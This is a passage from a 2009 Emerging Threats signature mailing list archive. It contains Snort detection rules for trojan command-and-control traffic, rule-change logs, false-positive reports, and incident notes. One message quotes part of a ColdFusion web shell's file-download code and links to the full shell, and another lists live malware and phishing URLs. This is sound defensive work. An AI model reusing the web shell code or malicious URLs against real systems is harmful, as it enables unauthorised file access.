        2009350 || ET TROJAN Win32.Hupigon Control Server Response
        2500133 || ET COMPROMISED Known Compromised or Hostile Host Traffic (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510133 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Added to emerging-sid-msg.map.txt (4):
        2009349 || ET TROJAN Bzub/Cimuz/Tanspy Reporting User Activity
        2009350 || ET TROJAN Win32.Hupigon Control Server Response
        2500133 || ET COMPROMISED Known Compromised or Hostile Host Traffic (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510133 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Added to emerging-virus.rules (1):
        #by shirkdog

[---]     Removed non-rule lines:    [---]

     -> Removed from emerging-exploit.rules (2):
        #This is a good auth back from the server
        #this is for a server saying auth failed

     -> Removed from emerging-sid-msg.map (1):
        2002792 || ET TROJAN Win32.Agent Reporting User Activity || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_W32Agent.dsi || url,doc.emergingthreats.net/2002792

     -> Removed from emerging-sid-msg.map.txt (1):
        2002792 || ET TROJAN Win32.Agent Reporting User Activity || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_W32Agent.dsi || url,doc.emergingthreats.net/2002792

     -> Removed from emerging-virus.rules (1):
        #By Tom Fischer


From frank at knobbe.us  Wed May 13 17:53:36 2009
From: frank at knobbe.us (Frank Knobbe)
Date: Wed, 13 May 2009 16:53:36 -0500
Subject: [Emerging-Sigs] adjustment to 2009345
In-Reply-To: <4A0AFCED.5060703@jonkmans.com>
References: <20090513080227.rzqjlq1d8gw8w4ww@mail.afferentsecurity.com>
	<4A0AE734.8080507@jonkmans.com>  <4A0AFCED.5060703@jonkmans.com>
Message-ID: <1242251616.21400.12.camel@localhost>

On Wed, 2009-05-13 at 13:01 -0400, Matt Jonkman wrote:
> I see now, have a similar situation. Added a threshold, pushing it out now.

Jack, stop confusing Matt!

With that added threshold, the rule (2009345) is now identical to
(2009346)!

I think the original idea was that if you don't want an alert on every
packet, don't enable SID 2009345 and use 2009346 instead.

-Frank

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 188 bytes
Desc: This is a digitally signed message part
Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090513/042c1d76/attachment.bin

From pepperjack at afferentsecurity.com  Wed May 13 18:09:34 2009
From: pepperjack at afferentsecurity.com (Jack Pepper)
Date: Wed, 13 May 2009 17:09:34 -0500
Subject: [Emerging-Sigs] adjustment to 2009345
In-Reply-To: <1242251616.21400.12.camel@localhost>
References: <20090513080227.rzqjlq1d8gw8w4ww@mail.afferentsecurity.com>
	<4A0AE734.8080507@jonkmans.com> <4A0AFCED.5060703@jonkmans.com>
	<1242251616.21400.12.camel@localhost>
Message-ID: <20090513170934.u41njf61cckw8kwo@mail.afferentsecurity.com>

Quoting Frank Knobbe <frank at knobbe.us>:

> I think the original idea was that if you don't want an alert on every
> packet, don't enable SID 2009345 and use 2009346 instead.


I was of the opinion that 2009345 needed a "limit" threshold because  
it will generate thousands and thousands of identical alerts if a  
website uses NTLM.

2009346 has a "threshold" threshold as a way to detect brute force attacks.

However, it is apparent that in an NTLM setting, 2009346 will always  
be indistinguishable from 2009345 and therefore redundant.



-- 

Framework?  I don't need no stinking framework!

----------------------------------------------------------------
@fferent Security Labs:  Isolate/Insulate/Innovate  
http://www.afferentsecurity.com


From frank at knobbe.us  Wed May 13 18:23:42 2009
From: frank at knobbe.us (Frank Knobbe)
Date: Wed, 13 May 2009 17:23:42 -0500
Subject: [Emerging-Sigs] adjustment to 2009345
In-Reply-To: <20090513170934.u41njf61cckw8kwo@mail.afferentsecurity.com>
References: <20090513080227.rzqjlq1d8gw8w4ww@mail.afferentsecurity.com>
	<4A0AE734.8080507@jonkmans.com> <4A0AFCED.5060703@jonkmans.com>
	<1242251616.21400.12.camel@localhost>
	<20090513170934.u41njf61cckw8kwo@mail.afferentsecurity.com>
Message-ID: <1242253422.21400.33.camel@localhost>

On Wed, 2009-05-13 at 17:09 -0500, Jack Pepper wrote:
> Quoting Frank Knobbe <frank at knobbe.us>:
> 
> > I think the original idea was that if you don't want an alert on every
> > packet, don't enable SID 2009345 and use 2009346 instead.
> 
> 
> I was of the opinion that 2009345 needed a "limit" threshold because  
> it will generate thousands and thousands of identical alerts if a  
> website uses NTLM.

I can see that. Then Matt needs to fix the rule by changing the
threshold back to limit :)

I don't think that sig is all that useful. I have to yet to catch
anything malicious with that. However, access to Outlook web mail, and
access from Blackberry devices trigger frequently (with a threshold of
30 in 60). Not really an actionable sig. I'm gonna give it another week
before I remove it from my set :)

-Frank

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 188 bytes
Desc: This is a digitally signed message part
Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090513/a4430f87/attachment.bin

From phatbuckett at gmail.com  Thu May 14 09:12:06 2009
From: phatbuckett at gmail.com (Darren Spruell)
Date: Thu, 14 May 2009 06:12:06 -0700
Subject: [Emerging-Sigs] Urlzone/Bebloh sig
Message-ID: <839aec700905140612qc6f65f7v790477d6d6ae4b86@mail.gmail.com>

alert tcp $HOME_NET 1024: -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN
Urlzone/Bebloh Communication with Controller";
flow:established,to_server; content:"GET "; depth:4;
uricontent:"get.php?type=slg&id="; nocase; classtype:trojan-activity;
reference:url,threatinfo.trendmicro.com/vinfo/grayware/ve_graywareDetails.asp?GNAME=TSPY_BEBLOH.KO&VSect=Td;
sid:XXXXXXX; rev:1;)

Urlzone/Bebloh is another banker/infostealer typically targeting German banks.

Typical C&C communication looks like requests to:

somedomain.tld/IT02/get.php?type=slg&id=ZLYER3I3REZASOKGSO

Every report I've seen makes it look like /get.php is so far very
static as well as the value of the 'type' parameter during C&C
communication. Also appears that /IT0%d/ varies a bit but for now
always uses /IT0\d/ so maybe it can be tightened a bit more if needed
with a URI pcre.

Would be interested to know if this is successful for anyone.

-- 
Darren Spruell
phatbuckett at gmail.com

From paul.edwards at kindsight.net  Thu May 14 09:25:18 2009
From: paul.edwards at kindsight.net (Paul Edwards)
Date: Thu, 14 May 2009 09:25:18 -0400
Subject: [Emerging-Sigs] seeing lots of hits on ET MALWARE Suspicious
	Mozilla User-Agent - Likely Fake (Mozilla/5.0) sid:	2009295
In-Reply-To: <49F5AFD2.8090901@jonkmans.com>
References: <F9D0F3A8-32A7-468A-AB65-043EAA23666E@auckland.ac.nz>
	<49F5AFD2.8090901@jonkmans.com>
Message-ID: <FB4A1EE8DA468A4D8C9CF68B0F68F354033FFE48@mse16be2.mse16.exchange.ms>

Excuse the delay... 

I am seeing significant hits on this as well.  
For some reason the client is sending an http post back 
to: 98.136.113.173 in my case.  Seems like an embedded 
tool of some sort (like toolbar or vista sidebar gadget).
The thing that's strange is the IP is hardcoded.   

Paul


-----Original Message-----
From: emerging-sigs-bounces at emergingthreats.net
[mailto:emerging-sigs-bounces at emergingthreats.net] On Behalf Of Matt
Jonkman
Sent: Monday, April 27, 2009 9:15 AM
To: Russell Fulton
Cc: Emerging Threats Signatures
Subject: Re: [Emerging-Sigs] seeing lots of hits on ET MALWARE
Suspicious Mozilla User-Agent - Likely Fake (Mozilla/5.0) sid: 2009295

Hmmm, as far as I know it's not a valid user-agent as I'm not aware of a
mozilla 5 spec. There's an html 5 spec coming around. perhaps thats what
these folks are intending to signify.

Anyone else seeing similar false positives? if so we'll have to drop the
sig I suspect.

Thanks Russell!

Matt

Russell Fulton wrote:
> Seeing quite a lot of machines triggering this alert when visiting
> 68.180.216.31 vcs1.msg.vip.sp1.yahoo.com  or 76.13.14.40 
> vcs2.msg.vip.ac4.yahoo.com.
> 
> Also saw one machine with 400 odd hits against a local airline booking

> site but nothing else.
> 
>      	 Count:  3(300) rows returned 	Time Window for this screen: Mon

> Apr 27 10:25:45 2009  to  Mon Apr 27 10:53:46 2009 	
> Src	Sig name	Total Events	Proto
> 162.112.18.100 flightbookings.airnewzealand.co.nz 	ET MALWARE  
> Suspicious Mozilla User-Agent - Likely Fake (Mozilla/5.0) 	455
6
> 68.180.216.31 vcs1.msg.vip.sp1.yahoo.com 		ET MALWARE
Suspicious  
> Mozilla User-Agent - Likely Fake (Mozilla/5.0) 	24 	6
> 76.13.14.40 vcs2.msg.vip.ac4.yahoo.com 			ET
MALWARE Suspicious  
> Mozilla User-Agent - Likely Fake (Mozilla/5.0) 	18 	6
> 
> Some of the machines these alerts come from I know to be very well 
> managed and looked after.
> 
> So it would appear that some legit things use this user-agent string.
> 
> Russell
> 
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

--
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc


_______________________________________________
Emerging-sigs mailing list
Emerging-sigs at emergingthreats.net
http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
-------------- next part --------------
A non-text attachment was scrubbed...
Name: post.JPG
Type: image/jpeg
Size: 16860 bytes
Desc: post.JPG
Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090514/695bafff/post-0001.jpe

From jonkman at jonkmans.com  Thu May 14 09:34:28 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Thu, 14 May 2009 09:34:28 -0400
Subject: [Emerging-Sigs] Urlzone/Bebloh sig
In-Reply-To: <839aec700905140612qc6f65f7v790477d6d6ae4b86@mail.gmail.com>
References: <839aec700905140612qc6f65f7v790477d6d6ae4b86@mail.gmail.com>
Message-ID: <4A0C1DE4.5030702@jonkmans.com>

Got it Darren, good sig. You're really at it this week, thanks!

Posting now.

matt

Darren Spruell wrote:
> alert tcp $HOME_NET 1024: -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN
> Urlzone/Bebloh Communication with Controller";
> flow:established,to_server; content:"GET "; depth:4;
> uricontent:"get.php?type=slg&id="; nocase; classtype:trojan-activity;
> reference:url,threatinfo.trendmicro.com/vinfo/grayware/ve_graywareDetails.asp?GNAME=TSPY_BEBLOH.KO&VSect=Td;
> sid:XXXXXXX; rev:1;)
> 
> Urlzone/Bebloh is another banker/infostealer typically targeting German banks.
> 
> Typical C&C communication looks like requests to:
> 
> somedomain.tld/IT02/get.php?type=slg&id=ZLYER3I3REZASOKGSO
> 
> Every report I've seen makes it look like /get.php is so far very
> static as well as the value of the 'type' parameter during C&C
> communication. Also appears that /IT0%d/ varies a bit but for now
> always uses /IT0\d/ so maybe it can be tightened a bit more if needed
> with a URI pcre.
> 
> Would be interested to know if this is successful for anyone.
> 

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc




From jonkman at jonkmans.com  Thu May 14 09:47:31 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Thu, 14 May 2009 09:47:31 -0400
Subject: [Emerging-Sigs] adjustment to 2009345
In-Reply-To: <1242253422.21400.33.camel@localhost>
References: <20090513080227.rzqjlq1d8gw8w4ww@mail.afferentsecurity.com>	<4A0AE734.8080507@jonkmans.com>
	<4A0AFCED.5060703@jonkmans.com>	<1242251616.21400.12.camel@localhost>	<20090513170934.u41njf61cckw8kwo@mail.afferentsecurity.com>
	<1242253422.21400.33.camel@localhost>
Message-ID: <4A0C20F3.1040707@jonkmans.com>

I think it'll be useful, but it should be a limit I think. Maybe a both.

Can't believe how many technologies rely on constant auth denials. All
day sitting there getting denied. Lovely design there.

Changing the threshold to something more useful.

Matt

Frank Knobbe wrote:
> On Wed, 2009-05-13 at 17:09 -0500, Jack Pepper wrote:
>> Quoting Frank Knobbe <frank at knobbe.us>:
>>
>>> I think the original idea was that if you don't want an alert on every
>>> packet, don't enable SID 2009345 and use 2009346 instead.
>>
>> I was of the opinion that 2009345 needed a "limit" threshold because  
>> it will generate thousands and thousands of identical alerts if a  
>> website uses NTLM.
> 
> I can see that. Then Matt needs to fix the rule by changing the
> threshold back to limit :)
> 
> I don't think that sig is all that useful. I have to yet to catch
> anything malicious with that. However, access to Outlook web mail, and
> access from Blackberry devices trigger frequently (with a threshold of
> 30 in 60). Not really an actionable sig. I'm gonna give it another week
> before I remove it from my set :)
> 
> -Frank
> 
> 
> 
> ------------------------------------------------------------------------
> 
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc



From mtombaugh at agilentcorp.com  Thu May 14 12:08:10 2009
From: mtombaugh at agilentcorp.com (Mark Tombaugh)
Date: Thu, 14 May 2009 12:08:10 -0400
Subject: [Emerging-Sigs] godaddy name server collateral damagement
Message-ID: <1242317290.22323.3554.camel@gnub>

Are ns21.domaincontrol.com and ns22.domaincontrol.com really
compromised? If so, whats the scoop? 

http://www.emergingthreats.net/rules/emerging-compromised.rules



From pepperjack at afferentsecurity.com  Thu May 14 12:24:40 2009
From: pepperjack at afferentsecurity.com (Jack Pepper)
Date: Thu, 14 May 2009 11:24:40 -0500
Subject: [Emerging-Sigs] godaddy name server collateral damagement
In-Reply-To: <1242317290.22323.3554.camel@gnub>
References: <1242317290.22323.3554.camel@gnub>
Message-ID: <20090514112440.629q7sw3ggc4w4cs@mail.afferentsecurity.com>

I am not sure if it's related, but I found this little tidbit while  
dissecting a zeus infection:

This host goes to "godaddy":
http://www.find-assist.com/search?qg=%20/bnt/bnt.php?zip=Dhh637cd11_0630db15&type=1&name=16843008&q=bnt&item=0&id=0&rdp=0&ref=0&rn=1DGFqqW2QriutQ6&rg=

This host goes to a fake yahoo phishing site:
http://wwwwp.find-assist.com/search?qg=%20/bnt/bnt.php?zip=Dhh637cd11_0630db15&type=1&name=16843008&q=bnt&item=0&id=0&rdp=0&ref=0&rn=1DGFqqW2QriutQ6&rg=

All the variants I tried for www[a-z]+.find-assist.com resolved to the  
same godaddy site.  except wwwwp.find-assist.com .

interesting, eh?

jp



Quoting Mark Tombaugh <mtombaugh at agilentcorp.com>:

> Are ns21.domaincontrol.com and ns22.domaincontrol.com really
> compromised? If so, whats the scoop?
>
> http://www.emergingthreats.net/rules/emerging-compromised.rules
>
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>



-- 

Framework?  I don't need no stinking framework!

----------------------------------------------------------------
@fferent Security Labs:  Isolate/Insulate/Innovate  
http://www.afferentsecurity.com


From jonkman at jonkmans.com  Thu May 14 12:31:41 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Thu, 14 May 2009 12:31:41 -0400
Subject: [Emerging-Sigs] godaddy name server collateral damagement
In-Reply-To: <20090514112440.629q7sw3ggc4w4cs@mail.afferentsecurity.com>
References: <1242317290.22323.3554.camel@gnub>
	<20090514112440.629q7sw3ggc4w4cs@mail.afferentsecurity.com>
Message-ID: <4A0C476D.5010706@jonkmans.com>

Those domaincontrol hosts were listed because they are active Waledac
controllers. Surely compromised or fraudulent hosting accounts. As
listed at Sudosecure.

I'll report them to Godaddy and I'm sure they'll drop them quickly.
They'll then drop out of the compromised list tonight.

Matt

Jack Pepper wrote:
> I am not sure if it's related, but I found this little tidbit while  
> dissecting a zeus infection:
> 
> This host goes to "godaddy":
> http://www.find-assist.com/search?qg=%20/bnt/bnt.php?zip=Dhh637cd11_0630db15&type=1&name=16843008&q=bnt&item=0&id=0&rdp=0&ref=0&rn=1DGFqqW2QriutQ6&rg=
> 
> This host goes to a fake yahoo phishing site:
> http://wwwwp.find-assist.com/search?qg=%20/bnt/bnt.php?zip=Dhh637cd11_0630db15&type=1&name=16843008&q=bnt&item=0&id=0&rdp=0&ref=0&rn=1DGFqqW2QriutQ6&rg=
> 
> All the variants I tried for www[a-z]+.find-assist.com resolved to the  
> same godaddy site.  except wwwwp.find-assist.com .
> 
> interesting, eh?
> 
> jp
> 
> 
> 
> Quoting Mark Tombaugh <mtombaugh at agilentcorp.com>:
> 
>> Are ns21.domaincontrol.com and ns22.domaincontrol.com really
>> compromised? If so, whats the scoop?
>>
>> http://www.emergingthreats.net/rules/emerging-compromised.rules
>>
>>
>> _______________________________________________
>> Emerging-sigs mailing list
>> Emerging-sigs at emergingthreats.net
>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>
> 
> 
> 

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc



From eoin.miller at trojanedbinaries.com  Thu May 14 14:58:19 2009
From: eoin.miller at trojanedbinaries.com (Eoin Miller)
Date: Thu, 14 May 2009 14:58:19 -0400
Subject: [Emerging-Sigs] ColdFusion Directory Browser
Message-ID: <4A0C69CB.4090107@trojanedbinaries.com>

After a recent incident at a client site, we had extracted a ColdFusion
directory browser that was uploaded and used:
http://trojanedbinaries.com/security/cfdirectorybrowser.txt

We found the same code in the wild located here:
http://www.b3ta.cr3ation.co.uk/onsite/cfm/7534.tmpfiles.cfm

After some head scratching when looking at the traffic, we noticed the
CF directory browser actually sets the "Content-Type" delivered back to
the client as "unknown:security.breach" when the attacker uses the
directory browser to download a file:

--snip--
<CFFILE ACTION="Read"
        FILE="#DirPath#"
        VARIABLE="var_name">   
<CFCONTENT TYPE="unknown:security.breach" FILE="#DirPath#" DELETEFILE="No">
</CFIF>
--snip--

This causes responses to file download requests to contain the following
HTTP headers:

--snip--
HTTP/1.1 200 OK
Date: <OMITTED>
Server: <OMITTED>
Content-Type: unknown:security.breach
Transfer-Encoding: chunked
Connection: keep-alive
--snip--

Using this, we developed a very simple signature to look for this
content type to generate alerts:

alert tcp $HTTP_SERVERS $HTTP_PORTS -> $EXTERNAL_NET any
(msg:"DEVELOPMENT ColdFusion Directory Browser File Read";
content:"content-type\: unknown\:security.breach"; nocase; sid:20080514;
rev:0;)

We are going to look into some further analysis of the commands in the
URI that are passed to the CF directory browser (DirPath|deletefile) and
also what the contents of a POST to the CF directory browser look like.
So far nothing unique enough stands out besides the "Content-Type" when
a file is actually downloaded. If anyone else would like to look into
this more who has free cycles and more skill, we would be grateful.

This is my first communication on the list, so also, hello all. :)

--
Eoin Miller
eoin.miller at trojanedbinaries.com






From emerging at emergingthreats.net  Thu May 14 16:00:10 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Thu, 14 May 2009 16:00:10 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090514200010.ADE094504D@goliath.jonkmans.com>


[***] Results from Oinkmaster started Thu May 14 16:00:10 2009 [***]

[+++]          Added rules:          [+++]

 2009351 - ET TROJAN Urlzone/Bebloh Communication with Controller (emerging-virus.rules)


[///]     Modified active rules:     [///]

 2009345 - ET ATTACK-RESPONSE HTTP 401 Unauthorized (emerging-attack_response.rules)
 2009346 - ET ATTACK-RESPONSE Frequent HTTP 401 Unauthorized - Possible Brute Force Attack (emerging-attack_response.rules)
 2009347 - ET TROJAN Tigger.a/Syzor Checkin (emerging-virus.rules)
 2009348 - ET CURRENT_EVENTS Inbound WorldPay Card Transaction Trojan (emerging.rules)
 2009349 - ET TROJAN Bzub/Cimuz/Tanspy Reporting User Activity (emerging-virus.rules)
 2009350 - ET TROJAN Win32.Hupigon Control Server Response (emerging-virus.rules)


[+++]      Added non-rule lines:     [+++]

     -> Added to emerging-sid-msg.map (15):
        2009347 || ET TROJAN Tigger.a/Syzor Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Tigger || url,doc.emergingthreats.net/2009347
        2009348 || ET CURRENT_EVENTS Inbound WorldPay Card Transaction Trojan || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Worldpay || url,doc.emergingthreats.net/2009348 || url,www.sophos.com/blogs/gc/g/2009/05/07/worldpay-card-transactions-carry-malware-danger/
        2009349 || ET TROJAN Bzub/Cimuz/Tanspy Reporting User Activity || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bzub || url,doc.emergingthreats.net/2009349
        2009350 || ET TROJAN Win32.Hupigon Control Server Response || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Hupington || url,doc.emergingthreats.net/2009350
        2009351 || ET TROJAN Urlzone/Bebloh Communication with Controller || url,threatinfo.trendmicro.com/vinfo/grayware/ve_graywareDetails.asp?GNAME=TSPY_BEBLOH.KO&VSect=Td
        2500134 || ET COMPROMISED Known Compromised or Hostile Host Traffic (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500135 || ET COMPROMISED Known Compromised or Hostile Host Traffic (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500136 || ET COMPROMISED Known Compromised or Hostile Host Traffic (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500137 || ET COMPROMISED Known Compromised or Hostile Host Traffic (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500138 || ET COMPROMISED Known Compromised or Hostile Host Traffic (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510134 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510135 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510136 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510137 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510138 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Added to emerging-sid-msg.map.txt (15):
        2009347 || ET TROJAN Tigger.a/Syzor Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Tigger || url,doc.emergingthreats.net/2009347
        2009348 || ET CURRENT_EVENTS Inbound WorldPay Card Transaction Trojan || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Worldpay || url,doc.emergingthreats.net/2009348 || url,www.sophos.com/blogs/gc/g/2009/05/07/worldpay-card-transactions-carry-malware-danger/
        2009349 || ET TROJAN Bzub/Cimuz/Tanspy Reporting User Activity || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bzub || url,doc.emergingthreats.net/2009349
        2009350 || ET TROJAN Win32.Hupigon Control Server Response || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Hupington || url,doc.emergingthreats.net/2009350
        2009351 || ET TROJAN Urlzone/Bebloh Communication with Controller || url,threatinfo.trendmicro.com/vinfo/grayware/ve_graywareDetails.asp?GNAME=TSPY_BEBLOH.KO&VSect=Td
        2500134 || ET COMPROMISED Known Compromised or Hostile Host Traffic (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500135 || ET COMPROMISED Known Compromised or Hostile Host Traffic (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500136 || ET COMPROMISED Known Compromised or Hostile Host Traffic (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500137 || ET COMPROMISED Known Compromised or Hostile Host Traffic (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500138 || ET COMPROMISED Known Compromised or Hostile Host Traffic (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510134 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510135 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510136 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510137 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510138 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

[---]     Removed non-rule lines:    [---]

     -> Removed from emerging-sid-msg.map (4):
        2009347 || ET TROJAN Tigger.a/Syzor Checkin
        2009348 || ET CURRENT_EVENTS Inbound WorldPay Card Transaction Trojan || url,www.sophos.com/blogs/gc/g/2009/05/07/worldpay-card-transactions-carry-malware-danger/
        2009349 || ET TROJAN Bzub/Cimuz/Tanspy Reporting User Activity
        2009350 || ET TROJAN Win32.Hupigon Control Server Response

     -> Removed from emerging-sid-msg.map.txt (4):
        2009347 || ET TROJAN Tigger.a/Syzor Checkin
        2009348 || ET CURRENT_EVENTS Inbound WorldPay Card Transaction Trojan || url,www.sophos.com/blogs/gc/g/2009/05/07/worldpay-card-transactions-carry-malware-danger/
        2009349 || ET TROJAN Bzub/Cimuz/Tanspy Reporting User Activity
        2009350 || ET TROJAN Win32.Hupigon Control Server Response


From r.fulton at auckland.ac.nz  Thu May 14 19:57:53 2009
From: r.fulton at auckland.ac.nz (Russell Fulton)
Date: Fri, 15 May 2009 11:57:53 +1200
Subject: [Emerging-Sigs] FP for ET TROJAN Downloader.Affill User Agent
	Detected (lol) Sig ID 2003642
Message-ID: <E4BCB6E7-5AEA-423F-88BF-611D081FFA89@auckland.ac.nz>

will trigger on any user-agent string that *starts* with 'lol'.   need  
a space on the end of the string?

Russell

DATA
--------
GET /lolcats/randomImage.php HTTP/1.1..User-Agent: LOLCatsFr
ee/1.4 CFNetwork/342.1 Darwin/9.4.1..Accept: */*..Accept-Lan
guage: en-us..Accept-Encoding: gzip, deflate..Connection: ke
ep-alive..Host: www.greenrobot.com....



From jonkman at jonkmans.com  Fri May 15 10:19:11 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Fri, 15 May 2009 10:19:11 -0400
Subject: [Emerging-Sigs] FP for ET TROJAN Downloader.Affill User Agent
 Detected (lol) Sig ID 2003642
In-Reply-To: <E4BCB6E7-5AEA-423F-88BF-611D081FFA89@auckland.ac.nz>
References: <E4BCB6E7-5AEA-423F-88BF-611D081FFA89@auckland.ac.nz>
Message-ID: <4A0D79DF.8010604@jonkmans.com>

Got it, thanks Russell. Actually I dropped the sig. There hasn't been a
hit on lol, nor another strain we've seen use that. if it crops back up
we'll put something in.

Thanks!

Matt

Russell Fulton wrote:
> will trigger on any user-agent string that *starts* with 'lol'.   need  
> a space on the end of the string?
> 
> Russell
> 
> DATA
> --------
> GET /lolcats/randomImage.php HTTP/1.1..User-Agent: LOLCatsFr
> ee/1.4 CFNetwork/342.1 Darwin/9.4.1..Accept: */*..Accept-Lan
> guage: en-us..Accept-Encoding: gzip, deflate..Connection: ke
> ep-alive..Host: www.greenrobot.com....
> 
> 
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc



From flamdugen at hotmail.com  Fri May 15 10:51:03 2009
From: flamdugen at hotmail.com (John Jacobs)
Date: Fri, 15 May 2009 09:51:03 -0500
Subject: [Emerging-Sigs] For rule inclusion/review;
	ISC Google & Twitter ET Sigs
Message-ID: <BLU148-W175813450C56B8813A7617B45F0@phx.gbl>



From flamdugen at hotmail.com  Fri May 15 10:58:24 2009
From: flamdugen at hotmail.com (John Jacobs)
Date: Fri, 15 May 2009 09:58:24 -0500
Subject: [Emerging-Sigs] Second Try; For review; ISC/Twitter/Google ET Sigs
Message-ID: <BLU148-W354C8EB7B454BA548130C3B45F0@phx.gbl>



From jonkman at jonkmans.com  Fri May 15 11:03:38 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Fri, 15 May 2009 11:03:38 -0400
Subject: [Emerging-Sigs] Second Try; For review;
 ISC/Twitter/Google ET Sigs
In-Reply-To: <BLU148-W354C8EB7B454BA548130C3B45F0@phx.gbl>
References: <BLU148-W354C8EB7B454BA548130C3B45F0@phx.gbl>
Message-ID: <4A0D844A.70907@jonkmans.com>

Can you share more detail? :)

Kidding. Maybe you're just building suspense?

Matt

John Jacobs wrote:
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc



